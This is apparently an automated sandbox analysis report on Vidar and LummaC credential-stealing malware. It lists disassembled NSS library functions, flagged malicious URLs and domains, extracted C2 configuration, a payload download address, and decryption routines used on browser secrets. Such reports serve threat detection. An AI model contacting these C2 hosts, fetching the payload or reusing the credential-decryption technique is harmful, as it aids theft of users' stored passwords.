Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C178DE7
EnterCriticalSection.KERNEL32 ref: 6C178DFC
PR_Unlock.NSS3 ref: 6C178E2D
PR_SetError.NSS3 ref: 6C178E49

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue
String ID:
API String ID: 284873373-0
Opcode ID: 172616a6e48fc60e0350257478844c95a9c7be965ffd708ad74e548ebd77b625
Instruction ID: 4ce8ee1138f3e31d1fb5937dcf0d0729d1f20ec1e8e280fb1d3fe8d92b0721bc
Opcode Fuzzy Hash: 172616a6e48fc60e0350257478844c95a9c7be965ffd708ad74e548ebd77b625
Instruction Fuzzy Hash: 10118C71605A019BD700AF78D4882AABBF4FF05754F014969DC98D7B40EB30E894CBE2

Function 6C1FAC70 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6C1E5F17,?,?,?,?,?,?,?,?,6C1EAAD4), ref: 6C1FAC94
PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6C1E5F17,?,?,?,?,?,?,?,?,6C1EAAD4), ref: 6C1FACA6
free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6C1EAAD4), ref: 6C1FACC0
free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6C1EAAD4), ref: 6C1FACDB

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: free$DestroyFreeK11_Monitor
String ID:
API String ID: 3989322779-0
Opcode ID: 05c6a924cce2bca626a18d8a748ecf738d69ad8175387b7cea67c93b2bdc0f7e
Instruction ID: db413c3a6f554c089d4e7e7c08d363dc790440b08fd3126d19d780411e5c1faa
Opcode Fuzzy Hash: 05c6a924cce2bca626a18d8a748ecf738d69ad8175387b7cea67c93b2bdc0f7e
Instruction Fuzzy Hash: EB015EB5B01B029BE750DF69E908757B7E8BF10A69B104839D86AC3E10E735F055CB91

Function 6C161D50 Relevance: 6.0, APIs: 4, Instructions: 47memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C161D75
PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C161D89
PORT_ZAlloc_Util.NSS3(00000010), ref: 6C161D9C
free.MOZGLUE(00000000), ref: 6C161DB8

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Alloc_Util$Errorfree
String ID:
API String ID: 939066016-0
Opcode ID: 2f28f28ee63594fc51217651ebf73ec7506010f36d8e33ab15334c4131fdf88e
Instruction ID: d2e7982efa21348e46f47c8eba26e37846ef2dfccf60c68193fe5ac52153ee44
Opcode Fuzzy Hash: 2f28f28ee63594fc51217651ebf73ec7506010f36d8e33ab15334c4131fdf88e
Instruction Fuzzy Hash: D9F0F4F2A0221057FB201F5BEC4AB873658AB91B98F320635ED1D9BF41D771E82486E1

Function 6C1FAC00 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

PK11_FreeSymKey.NSS3(?,6C1E5D40,00000000,?,?,6C1D6AC6,6C1E639C), ref: 6C1FAC2D

Part of subcall function 6C19ADC0: TlsGetValue.KERNEL32(?,6C17CDBB,?,6C17D079,00000000,00000001), ref: 6C19AE10
Part of subcall function 6C19ADC0: EnterCriticalSection.KERNEL32(?,?,6C17CDBB,?,6C17D079,00000000,00000001), ref: 6C19AE24
Part of subcall function 6C19ADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C17D079,00000000,00000001), ref: 6C19AE5A
Part of subcall function 6C19ADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C17CDBB,?,6C17D079,00000000,00000001), ref: 6C19AE6F
Part of subcall function 6C19ADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C17CDBB,?,6C17D079,00000000,00000001), ref: 6C19AE7F
Part of subcall function 6C19ADC0: TlsGetValue.KERNEL32(?,6C17CDBB,?,6C17D079,00000000,00000001), ref: 6C19AEB1
Part of subcall function 6C19ADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C17CDBB,?,6C17D079,00000000,00000001), ref: 6C19AEC9

PK11_FreeSymKey.NSS3(?,6C1E5D40,00000000,?,?,6C1D6AC6,6C1E639C), ref: 6C1FAC44
SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,6C1E5D40,00000000,?,?,6C1D6AC6,6C1E639C), ref: 6C1FAC59
free.MOZGLUE(8CB6FF01,6C1D6AC6,6C1E639C,?,?,?,?,?,?,?,?,?,6C1E5D40,00000000,?,6C1EAAD4), ref: 6C1FAC62

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
String ID:
API String ID: 1595327144-0
Opcode ID: 584d2b38426c47a5931a69541be35d8578b398cec532f0a786e85dc8a0b4bf22
Instruction ID: 2d0cb19e55286e2b57243ac01698d92c1cc988c4ed64e4b8a2ce9ce4919b6a4c
Opcode Fuzzy Hash: 584d2b38426c47a5931a69541be35d8578b398cec532f0a786e85dc8a0b4bf22
Instruction Fuzzy Hash: 4C018BB5A002009FDB00CF54E8D0B4677E8AF54B18F188068E9598F706D735E809CBA1

Function 6C26CC50 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(?), ref: 6C26CC61
free.MOZGLUE ref: 6C26CC6E
DeleteCriticalSection.KERNEL32(?), ref: 6C26CC80
free.MOZGLUE(?), ref: 6C26CC87

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: CriticalDeleteSectionfree
String ID:
API String ID: 2988086103-0
Opcode ID: 5b96e531d5f61987139b56bd4853035a4fb8980538eab9c87202a92d6a3e682f
Instruction ID: 04783c664d60f6690dfffb028a6b7ec482b8f2ff043391661a253baada234dfa
Opcode Fuzzy Hash: 5b96e531d5f61987139b56bd4853035a4fb8980538eab9c87202a92d6a3e682f
Instruction Fuzzy Hash: CEE030767006089BCA10EFA8DC4888A77ACEE496703150925EA91C3740D232F905CBA1

Function 6C1A4D10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000), ref: 6C1A4D57
PR_snprintf.NSS3(?,00000008,%d.%d,?,?), ref: 6C1A4DE6

Strings

%d.%d, xrefs: 6C1A4DDE

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: ErrorR_snprintf
String ID: %d.%d
API String ID: 2298970422-3954714993
Opcode ID: be43c273dce7ad219693fb10e7099b31641cbe8fe5f05400178ae5a6ba049297
Instruction ID: 5ba14ee7d002a96c4da64bad2fc4168fa63b83ba45d249f8bfc383b9383e61b6
Opcode Fuzzy Hash: be43c273dce7ad219693fb10e7099b31641cbe8fe5f05400178ae5a6ba049297
Instruction Fuzzy Hash: 6531E8B6D042186BEB109BF19C05BFF7768EF51308F050429ED159B781EF30991ACBA2

Function 6C1EAF70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

PR_GetUniqueIdentity.NSS3(SSL), ref: 6C1EAF78

Part of subcall function 6C14ACC0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C14ACE2
Part of subcall function 6C14ACC0: malloc.MOZGLUE(00000001), ref: 6C14ACEC
Part of subcall function 6C14ACC0: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C14AD02
Part of subcall function 6C14ACC0: TlsGetValue.KERNEL32 ref: 6C14AD3C
Part of subcall function 6C14ACC0: calloc.MOZGLUE(00000001,?), ref: 6C14AD8C
Part of subcall function 6C14ACC0: PR_Unlock.NSS3 ref: 6C14ADC0
Part of subcall function 6C14ACC0: PR_Unlock.NSS3 ref: 6C14AE8C
Part of subcall function 6C14ACC0: free.MOZGLUE(?), ref: 6C14AEAB

memcpy.VCRUNTIME140(6C2B3084,6C2B02AC,00000090), ref: 6C1EAF94

Strings

SSL, xrefs: 6C1EAF73

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Unlock$IdentityUniqueValuecallocfreemallocmemcpystrcpystrlen
String ID: SSL
API String ID: 2424436289-2135378647
Opcode ID: 4cfd0c905103dc7f25834abc8bd0bcaec07088529abdf574d3c9038aa4ce6adb
Instruction ID: 061ff1bd12158e6c679314ab4c380ddaed8b486abbb03d3277180a2132a3ecd8
Opcode Fuzzy Hash: 4cfd0c905103dc7f25834abc8bd0bcaec07088529abdf574d3c9038aa4ce6adb
Instruction Fuzzy Hash: 8C21A2B2614F4A9BCA21DF11981B3127EB1BB0A74C7104908CD2AABBA4DF315048DFDD

Function 6C140F00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

PR_GetPageSize.NSS3(6C140936,FFFFE8AE,?,6C0D16B7,00000000,?,6C140936,00000000,?,6C0D204A), ref: 6C140F1B

Part of subcall function 6C141370: GetSystemInfo.KERNEL32(?,?,?,?,6C140936,?,6C140F20,6C140936,FFFFE8AE,?,6C0D16B7,00000000,?,6C140936,00000000), ref: 6C14138F

PR_NewLogModule.NSS3(clock,6C140936,FFFFE8AE,?,6C0D16B7,00000000,?,6C140936,00000000,?,6C0D204A), ref: 6C140F25

Part of subcall function 6C141110: calloc.MOZGLUE(00000001,0000000C,?,?,?,?,?,?,?,?,?,?,6C140936,00000001,00000040), ref: 6C141130
Part of subcall function 6C141110: strdup.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,6C140936,00000001,00000040), ref: 6C141142
Part of subcall function 6C141110: PR_GetEnvSecure.NSS3(NSPR_LOG_MODULES,?,?,?,?,?,?,?,?,?,?,?,?,?,6C140936,00000001), ref: 6C141167

Strings

clock, xrefs: 6C140F20

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: InfoModulePageSecureSizeSystemcallocstrdup
String ID: clock
API String ID: 536403800-3195780754
Opcode ID: ca4e0b993c7a189f177298fc28aa30087c908f6e7b297ff69365bed2f87c7e79
Instruction ID: 7ca01857f7bc8d26035f5c2c6bd0602d01987e39a6b84a3c49a1be6d9bd48a72
Opcode Fuzzy Hash: ca4e0b993c7a189f177298fc28aa30087c908f6e7b297ff69365bed2f87c7e79
Instruction Fuzzy Hash: 0CD0223120820851C10063A79C48BAAB2BCC7D367EF20CC22E42802D804F2480FEC369

Function 6C1B0DB0 Relevance: 5.1, APIs: 4, Instructions: 97COMMON

Download Yara Rule

APIs

calloc.MOZGLUE ref: 6C1B0DF5
TlsGetValue.KERNEL32 ref: 6C1B0E2D
TlsGetValue.KERNEL32 ref: 6C1B0E58
TlsGetValue.KERNEL32 ref: 6C1B0E84

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Value$calloc
String ID:
API String ID: 3339632435-0
Opcode ID: ca3ddb6a89bd9b47266dbb66bdec1fcdd092d1644052d50f5d00f78baf5f39a0
Instruction ID: bd046417e5cefa6ac32acc6f8bd42c654c750c52aaccc09dfd75c42082692968
Opcode Fuzzy Hash: ca3ddb6a89bd9b47266dbb66bdec1fcdd092d1644052d50f5d00f78baf5f39a0
Instruction Fuzzy Hash: EF31C6F06443818BDB006F7DC68866977B4BF15348F02866DEC98A7A51EB35D485CF82

Function 6C1B0F10 Relevance: 5.1, APIs: 4, Instructions: 52stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C152AF5,?,?,?,?,?,6C150A1B,00000000), ref: 6C1B0F1A
malloc.MOZGLUE(00000001), ref: 6C1B0F30
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C1B0F42
TlsGetValue.KERNEL32 ref: 6C1B0F5B

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Valuemallocmemcpystrlen
String ID:
API String ID: 2332725481-0
Opcode ID: 695292f0a7bfaafc337c3e437232e3e76607902ea7c2d18f547994d944fc0157
Instruction ID: 0fb0c8ea52d98d791e0f16e2b89c476149a796ee41ca077fe7d23dbc549f45b9
Opcode Fuzzy Hash: 695292f0a7bfaafc337c3e437232e3e76607902ea7c2d18f547994d944fc0157
Instruction Fuzzy Hash: 98014CF1F002805BE7102B3F9E086667AACEF52299F0101B9EC0CD2A21EB31C444CAE2

Source: https://captainynfanw.shop/api	Avira URL Cloud: Label: malware
Source: https://tendencerangej.shop/api	Avira URL Cloud: Label: malware
Source: coursedonnyre.shop	Avira URL Cloud: Label: malware
Source: https://116.203.165.127	Avira URL Cloud: Label: malware
Source: strappystyio.shop	Avira URL Cloud: Label: malware
Source: https://116.203.165.127/vcruntime140.dlln	Avira URL Cloud: Label: malware
Source: https://tearrybyiwo.shop/api	Avira URL Cloud: Label: malware
Source: http://147.45.44.104/prog/66eef0ca0fb35_lfdsa.exe	Avira URL Cloud: Label: malware
Source: tearrybyiwo.shop	Avira URL Cloud: Label: malware
Source: https://116.203.165.127/nss3.dllk	Avira URL Cloud: Label: malware
Source: http://147.45.44.104/prog/66eef0ca0fb35_lfdsa.exe1kkkktoken	Avira URL Cloud: Label: malware
Source: https://116.203.165.127/vcruntime140.dll2	Avira URL Cloud: Label: malware
Source: https://116.203.165.127/softokn3.dll)	Avira URL Cloud: Label: malware
Source: https://116.203.165.127/freebl3.dllI	Avira URL Cloud: Label: malware
Source: surveriysiop.shop	Avira URL Cloud: Label: malware
Source: http://147.45.44.104/prog/66eef0ca0fb35_lfdsa.exeorm-data;	Avira URL Cloud: Label: malware
Source: https://surveriysiop.shop/api	Avira URL Cloud: Label: malware
Source: https://116.203.165.127/softokn3.dll	Avira URL Cloud: Label: malware
Source: tendencerangej.shop	Avira URL Cloud: Label: malware
Source: https://116.203.165.127/freebl3.dll	Avira URL Cloud: Label: malware
Source: http://147.45.44.104/prog/66eef0ca0fb35_lfdsa.exeh	Avira URL Cloud: Label: malware
Source: https://116.203.165.127/sqlp.dll	Avira URL Cloud: Label: malware
Source: https://116.203.165.127/msvcp140.dll	Avira URL Cloud: Label: malware
Source: https://appleboltelwk.shop/api	Avira URL Cloud: Label: malware

Source: 00000000.00000002.1722743408.00000000035B5000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "58cd250b15e666e5f72fcf5caa6cb131"}
Source: 10.2.RegAsm.exe.400000.0.raw.unpack	Malware Configuration Extractor: LummaC {"C2 url": ["surveriysiop.shop", "captainynfanw.shop", "coursedonnyre.shop", "appleboltelwk.shop", "tearrybyiwo.shop", "fossillargeiw.shop", "tendencerangej.shop", "strappystyio.shop"], "Build id": "H8NgCl--"}

Source: https://captainynfanw.shop/api	Virustotal: Detection: 5%	Perma Link
Source: https://tendencerangej.shop/api	Virustotal: Detection: 5%	Perma Link
Source: https://116.203.165.127	Virustotal: Detection: 6%	Perma Link
Source: https://tearrybyiwo.shop/api	Virustotal: Detection: 5%	Perma Link
Source: http://147.45.44.104/prog/66eef0ca0fb35_lfdsa.exe	Virustotal: Detection: 19%	Perma Link

Source: C:\ProgramData\BKKKEGIDBG.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\66eef0ca0fb35_lfdsa[1].exe	Joe Sandbox ML: detected

Source: 10.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: strappystyio.shop
Source: 10.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: coursedonnyre.shop
Source: 10.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: fossillargeiw.shop
Source: 10.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: tendencerangej.shop
Source: 10.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: appleboltelwk.shop
Source: 10.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: tearrybyiwo.shop
Source: 10.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: captainynfanw.shop
Source: 10.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: surveriysiop.shop
Source: 10.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: appleboltelwk.shop
Source: 10.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: lid=%s&j=%s&ver=4.0
Source: 10.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: TeslaBrowser/5.5
Source: 10.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: - Screen Resoluton:
Source: 10.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: - Physical Installed Memory:
Source: 10.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: Workgroup: -
Source: 10.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: H8NgCl--

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004080A1 CryptUnprotectData,LocalAlloc,LocalFree,	3_2_004080A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00408048 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	3_2_00408048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00411E5D CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	3_2_00411E5D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040A7D8 _memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,_memmove,lstrcatA,PK11_FreeSlot,lstrcatA,	3_2_0040A7D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C19A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	3_2_6C19A9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C164420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	3_2_6C164420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C194440 PK11_PrivDecrypt,	3_2_6C194440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C1944C0 PK11_PubEncrypt,	3_2_6C1944C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C1E25B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,	3_2_6C1E25B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C19A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,	3_2_6C19A650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C178670 PK11_ExportEncryptedPrivKeyInfo,	3_2_6C178670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C17E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,	3_2_6C17E6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C1BA730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,	3_2_6C1BA730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C1C0180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,	3_2_6C1C0180
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C1943B0 PK11_PubEncryptPKCS1,PR_SetError,	3_2_6C1943B0
